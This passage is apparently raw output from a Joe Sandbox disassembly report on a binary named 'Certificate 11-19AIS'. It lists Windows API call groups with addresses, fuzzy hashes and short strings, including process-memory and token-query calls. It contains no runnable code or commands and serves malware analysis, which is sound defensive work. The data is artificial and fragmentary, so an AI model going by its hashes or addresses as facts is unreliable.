                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 007CAFE3
                                                                              • SelectObject.GDI32(?,00000000), ref: 007CAFF2
                                                                              • BeginPath.GDI32(?), ref: 007CB009
                                                                              • SelectObject.GDI32(?,00000000), ref: 007CB033
                                                                              Similarity
                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                              • String ID:
                                                                              • API String ID: 3225163088-0
                                                                              • Opcode ID: 6142f965b26674b7dfb6d68e6098694ada8f30c7c0396a563d445e6b0b7bd517
                                                                              • Instruction ID: 9d9b0211bbaab64072db0cf926fed3397ecda81f421014c65a4563301a2eb0ac
                                                                              • Opcode Fuzzy Hash: 6142f965b26674b7dfb6d68e6098694ada8f30c7c0396a563d445e6b0b7bd517
                                                                              • Instruction Fuzzy Hash: BF217FB0800309EFDF10DF69EC4DB9A7B68BB60356F14421EF429961B4D37488D9DB91
                                                                              APIs
                                                                              • __calloc_crt.LIBCMT ref: 007D21A9
                                                                              • CreateThread.KERNEL32(?,?,007D22DF,00000000,?,?), ref: 007D21ED
                                                                              • GetLastError.KERNEL32 ref: 007D21F7
                                                                              • _free.LIBCMT ref: 007D2200
                                                                              • __dosmaperr.LIBCMT ref: 007D220B
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              Similarity
                                                                              • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                              • String ID:
                                                                              • API String ID: 2664167353-0
                                                                              • Opcode ID: af0b94cc47bdb0963e26a7e6b0f3eb7505e46e8e755e366dbb28679af47b549f
                                                                              • Instruction ID: 1f5d05f269fd8319c24147ddbd19705c58cda80ab9fed8b53dfaa0e60029255f
                                                                              • Opcode Fuzzy Hash: af0b94cc47bdb0963e26a7e6b0f3eb7505e46e8e755e366dbb28679af47b549f
                                                                              • Instruction Fuzzy Hash: 6611E533204306AF9B15AF65DC45D9B37B8FF50760710442BF91486342FB39981386B0
                                                                              APIs
                                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007EABD7
                                                                              • GetLastError.KERNEL32(?,007EA69F,?,?,?), ref: 007EABE1
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,007EA69F,?,?,?), ref: 007EABF0
                                                                              • HeapAlloc.KERNEL32(00000000,?,007EA69F,?,?,?), ref: 007EABF7
                                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 007EAC0E
                                                                              Similarity
                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 842720411-0
                                                                              • Opcode ID: e2e13155928b440a6374b1a78b68bb68c2fbb3187d22858faee50deaa5f75e09
                                                                              • Instruction ID: 2629b3b087bd0eeaa64da702ce845557073afa0a3593bab8bac230ef89700cdc
                                                                              • Opcode Fuzzy Hash: e2e13155928b440a6374b1a78b68bb68c2fbb3187d22858faee50deaa5f75e09
                                                                              • Instruction Fuzzy Hash: E1016970201244BFDB114FAAEC48DAB3BBCFF8A3547200829F905C3260DA759C40CBB0
                                                                              APIs
                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007F7A74
                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007F7A82
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007F7A8A
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007F7A94
                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007F7AD0
                                                                              Similarity
                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                              • String ID:
                                                                              • API String ID: 2833360925-0
                                                                              • Opcode ID: 6e951797dc7b430913efc531719d963e1150a8f00821e9713d4fa693930d4cc8
                                                                              • Instruction ID: 923054d153b058fa232762fe1fe412ea30f7b73151a655921cd0a8f1cc53a5a4
                                                                              • Opcode Fuzzy Hash: 6e951797dc7b430913efc531719d963e1150a8f00821e9713d4fa693930d4cc8
                                                                              • Instruction Fuzzy Hash: C6012D31C0462DDBCF04AFE8EC899EDBB78FB48711F024455E602B2250DB349650C7A1
                                                                              APIs
                                                                              • CLSIDFromProgID.OLE32 ref: 007E9ADC
                                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 007E9AF7
                                                                              • lstrcmpiW.KERNEL32(?,00000000), ref: 007E9B05
                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 007E9B15
                                                                              • CLSIDFromString.OLE32(?,?), ref: 007E9B21
                                                                              Similarity
                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 3897988419-0
                                                                              • Opcode ID: b957bfadf0012f7abdfaea007065d89b35e877417489830936eb0496df07a0c4
                                                                              • Instruction ID: eba47e785c49fa4176f76bfbbfe1304f7a835cbc169c4a32bfe778d3d3feb371
                                                                              • Opcode Fuzzy Hash: b957bfadf0012f7abdfaea007065d89b35e877417489830936eb0496df07a0c4
                                                                              • Instruction Fuzzy Hash: 86018FB6611204FFDB104F66EC44B9A7AEDEF88351F148C34FA05D2210D778DD009BA0
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007EAA79
                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007EAA83
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007EAA92
                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007EAA99
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007EAAAF
                                                                              Similarity
                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 44706859-0
                                                                              • Opcode ID: 2bdb9d97d63a980d344e8e63d908d5eed34277b2f31a4f7e413311b4a3002b53
                                                                              • Instruction ID: f41677bd4d4dab008a84117e649255aff35b253d72057e5e8c528b2a85ca4302
                                                                              • Opcode Fuzzy Hash: 2bdb9d97d63a980d344e8e63d908d5eed34277b2f31a4f7e413311b4a3002b53
                                                                              • Instruction Fuzzy Hash: EBF04F712013047FEB115FA5AC89EAB7BACFF89754F004829F941C7190DA64EC51DA61
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007EAADA
                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007EAAE4
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007EAAF3
                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007EAAFA
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007EAB10
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 44706859-0
                                                                              • Opcode ID: 6b2b4082199fe0170ef718f2bdc54cccd8b0aeec126f06c55a7c910c8d67acc8
                                                                              • Instruction ID: c56a9ad9517f7ad1f50c8dabc51d051ea88ccc8c48429b86948bc4a1f337ccc7
                                                                              • Opcode Fuzzy Hash: 6b2b4082199fe0170ef718f2bdc54cccd8b0aeec126f06c55a7c910c8d67acc8
                                                                              • Instruction Fuzzy Hash: D8F04F712013087FEB111FA5FC88EAB3B6EFF99754F000829F941C7190DA64EC119A61
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 007EEC94
                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 007EECAB
                                                                              • MessageBeep.USER32(00000000), ref: 007EECC3
                                                                              • KillTimer.USER32(?,0000040A), ref: 007EECDF
                                                                              • EndDialog.USER32(?,00000001), ref: 007EECF9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 3741023627-0
                                                                              • Opcode ID: 33fe2bddaa06c5fb8b3b015714936c200ee0762ede5691b9d9e8e616e14ea774
                                                                              • Instruction ID: 33a918c6c710364d4c1048c0fc25d0f6f37cdced6b6f3213d9cfa68b74a0c849
                                                                              • Opcode Fuzzy Hash: 33fe2bddaa06c5fb8b3b015714936c200ee0762ede5691b9d9e8e616e14ea774
                                                                              • Instruction Fuzzy Hash: AF018130500744EBEB245B21EE5EB9677B8FB54705F100D59B693A14F0EBF8AA94CB90
                                                                              APIs
                                                                              • EndPath.GDI32(?), ref: 007CB0BA
                                                                              • StrokeAndFillPath.GDI32(?,?,0082E680,00000000,?,?,?), ref: 007CB0D6
                                                                              • SelectObject.GDI32(?,00000000), ref: 007CB0E9
                                                                              • DeleteObject.GDI32 ref: 007CB0FC
                                                                              • StrokePath.GDI32(?), ref: 007CB117
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                              • String ID:
                                                                              • API String ID: 2625713937-0
                                                                              • Opcode ID: d36855f93941eb12645a2a5bbe5557ac5ab0dc3fe5cafc4b21ace521ea626274
                                                                              • Instruction ID: ce603fab6faac896372cb1fd29a829a1281d74cf2c373c00ff0c601d25f5e602
                                                                              • Opcode Fuzzy Hash: d36855f93941eb12645a2a5bbe5557ac5ab0dc3fe5cafc4b21ace521ea626274
                                                                              • Instruction Fuzzy Hash: F6F01430004608EFCF25AF69EC0EB983B64BB60762F088318F469894F4C734C9AADF50
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 007FF2DA
                                                                              • CoCreateInstance.OLE32(0083DA7C,00000000,00000001,0083D8EC,?), ref: 007FF2F2
                                                                              • CoUninitialize.OLE32 ref: 007FF555
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize
                                                                              • String ID: .lnk
                                                                              • API String ID: 948891078-24824748
                                                                              • Opcode ID: 6bf5078b61e59ff57d9fe26392117a45639f78fee55158690fac5b5e1773103f
                                                                              • Instruction ID: cdf5baed826f56b6ac851037882856b406c776d5e0bd38f3d8ad215221d6b9ef
                                                                              • Opcode Fuzzy Hash: 6bf5078b61e59ff57d9fe26392117a45639f78fee55158690fac5b5e1773103f
                                                                              • Instruction Fuzzy Hash: B1A13AB1104201AFD301EF64C885EAFB7E8EF98714F00495DF65597292EB74EA09CBA2
                                                                              APIs
                                                                                • Part of subcall function 007B660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B53B1,?,?,007B61FF,?,00000000,00000001,00000000), ref: 007B662F
                                                                              • CoInitialize.OLE32(00000000), ref: 007FE85D
                                                                              • CoCreateInstance.OLE32(0083DA7C,00000000,00000001,0083D8EC,?), ref: 007FE876
                                                                              • CoUninitialize.OLE32 ref: 007FE893
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                              • String ID: .lnk
                                                                              • API String ID: 2126378814-24824748
                                                                              • Opcode ID: ab5f8fb9ad3422b070d3ab6d9f4775710e29ae60c101918550de1570a472005f
                                                                              • Instruction ID: 3432243e735cc4da795c582fa67433e258c7d7f78ee1dfeec0537d8369211a46
                                                                              • Opcode Fuzzy Hash: ab5f8fb9ad3422b070d3ab6d9f4775710e29ae60c101918550de1570a472005f
                                                                              • Instruction Fuzzy Hash: 3DA13575604305DFCB10DF14C888A6ABBE5FF88310F058958FAA69B3A1CB35EC45CB92
                                                                              APIs
                                                                              • __startOneArgErrorHandling.LIBCMT ref: 007D32ED
                                                                                • Part of subcall function 007DE0D0: __87except.LIBCMT ref: 007DE10B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorHandling__87except__start
                                                                              • String ID: pow
                                                                              • API String ID: 2905807303-2276729525
                                                                              • Opcode ID: 6122f985ada96c9e22a8031c7362f448e07624fd0b8a305670583248b996e136
                                                                              • Instruction ID: e104a634e3b0f2285e6ceffe8f6ca6f34e90a61d32043d462ec459e001dbb651
                                                                              • Opcode Fuzzy Hash: 6122f985ada96c9e22a8031c7362f448e07624fd0b8a305670583248b996e136
                                                                              • Instruction Fuzzy Hash: AC515521A08205D6CB167714CA0577E7BB4BB41720F648D2BF4C58A3A9EE3D9EC4DA43
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0084DC50,?,0000000F,0000000C,00000016,0084DC50,?), ref: 007F4645
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 007F46C5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper$__itow__swprintf
                                                                              • String ID: REMOVE$THIS
                                                                              • API String ID: 3797816924-776492005
                                                                              • Opcode ID: 5ac8902aa59ebe425837c549527d4f9a4d9ef4e5d27ce26ba41146c7f57b57ea
                                                                              • Instruction ID: 2f9cb19f86e3ff60518304d96a3f3261e086be7a89cd01dce4ced16ef7a36812
                                                                              • Opcode Fuzzy Hash: 5ac8902aa59ebe425837c549527d4f9a4d9ef4e5d27ce26ba41146c7f57b57ea
                                                                              • Instruction Fuzzy Hash: B0414E74A00219DFCF01EF94C885ABEB7B5FF45314F148459EA16AB351D7389D45CB60
                                                                              APIs
                                                                                • Part of subcall function 007F430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007EBC08,?,?,00000034,00000800,?,00000034), ref: 007F4335
                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007EC1D3
                                                                                • Part of subcall function 007F42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007EBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 007F4300
                                                                                • Part of subcall function 007F422F: GetWindowThreadProcessId.USER32(?,?), ref: 007F425A
                                                                                • Part of subcall function 007F422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007EBBCC,00000034,?,?,00001004,00000000,00000000), ref: 007F426A
                                                                                • Part of subcall function 007F422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007EBBCC,00000034,?,?,00001004,00000000,00000000), ref: 007F4280
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007EC240
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007EC28D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                              • String ID: @
                                                                              • API String ID: 4150878124-2766056989
                                                                              • Opcode ID: 4ab1b638e0e1423b1b9701392271a2fbfa52afc2f46e3849463806b3fc4b3cab
                                                                              • Instruction ID: f60fca4fe817be51c6ce754badf08515c0f55f6538866f978a409978d54b0873
                                                                              • Opcode Fuzzy Hash: 4ab1b638e0e1423b1b9701392271a2fbfa52afc2f46e3849463806b3fc4b3cab
                                                                              • Instruction Fuzzy Hash: D4414B7690121CAFDB11DFA4CC86EEEB7B8BF09300F004095FA55B7281DA75AE45CBA1
                                                                              APIs
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0084DC00,00000000,?,?,?,?), ref: 0081A6D8
                                                                              • GetWindowLongW.USER32 ref: 0081A6F5
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0081A705
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long
                                                                              • String ID: SysTreeView32
                                                                              • API String ID: 847901565-1698111956
                                                                              • Opcode ID: 9e2a3c9f0c7eab7bfa5388bdd81ff6d36df5d06e6e19a36276282404e0128153
                                                                              • Instruction ID: a6356ae843f33170423a1f9e04f33872ea5af0f4a07355abed067d473465efe3
                                                                              • Opcode Fuzzy Hash: 9e2a3c9f0c7eab7bfa5388bdd81ff6d36df5d06e6e19a36276282404e0128153
                                                                              • Instruction Fuzzy Hash: 1E319C31201209ABDB258E78DC45BEA77ADFF59324F254719F8B9D22E0D734E9908B50
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0081A15E
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0081A172
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0081A196
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window
                                                                              • String ID: SysMonthCal32
                                                                              • API String ID: 2326795674-1439706946
                                                                              • Opcode ID: f475c6106c1e6b1a2b6f7d50b446b0bc85a67a15905647d8d863dca0103b1409
                                                                              • Instruction ID: 1ee54ebc9827bc5430948eca9667dcabc22709efa4acc7d3ded2dc7c94584b53
                                                                              • Opcode Fuzzy Hash: f475c6106c1e6b1a2b6f7d50b446b0bc85a67a15905647d8d863dca0103b1409
                                                                              • Instruction Fuzzy Hash: 8A217C32510218BBDF159EA4CC86FEA3B69FF48714F110214FA56AB190D6B5AC958BA0
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0081A941
                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0081A94F
                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0081A956
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyWindow
                                                                              • String ID: msctls_updown32
                                                                              • API String ID: 4014797782-2298589950
                                                                              • Opcode ID: 1755223dd48651f1264d4f8b8f27d3be6067792228b0fb3b32e0bbf0f1cf8bbd
                                                                              • Instruction ID: 175c76c2c9c1c9bc36ffeaca9504fcafdddc864aaaa18146f4e61815221abd58
                                                                              • Opcode Fuzzy Hash: 1755223dd48651f1264d4f8b8f27d3be6067792228b0fb3b32e0bbf0f1cf8bbd
                                                                              • Instruction Fuzzy Hash: 7E21AEB5200209AFDB14DF28DC86DA737ACFF6A3A4B050059FA15DB261DB31EC918B61
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00819A30
                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00819A40
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00819A65
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MoveWindow
                                                                              • String ID: Listbox
                                                                              • API String ID: 3315199576-2633736733
                                                                              • Opcode ID: 9dfb42ba0220d29cd120cd6b7f98936f9f718fcbb86fb7ac4f4b7cbb12144aee
                                                                              • Instruction ID: 38aa2eb6460acb13b242f65079064a7e2ffa5fdd7b8534fed5729c375002d539
                                                                              • Opcode Fuzzy Hash: 9dfb42ba0220d29cd120cd6b7f98936f9f718fcbb86fb7ac4f4b7cbb12144aee
                                                                              • Instruction Fuzzy Hash: 8221B072610118BFDF218F54DC95EFB3BAEFF89750F018128F9959B190C6719C9187A0
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0081A46D
                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0081A482
                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0081A48F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
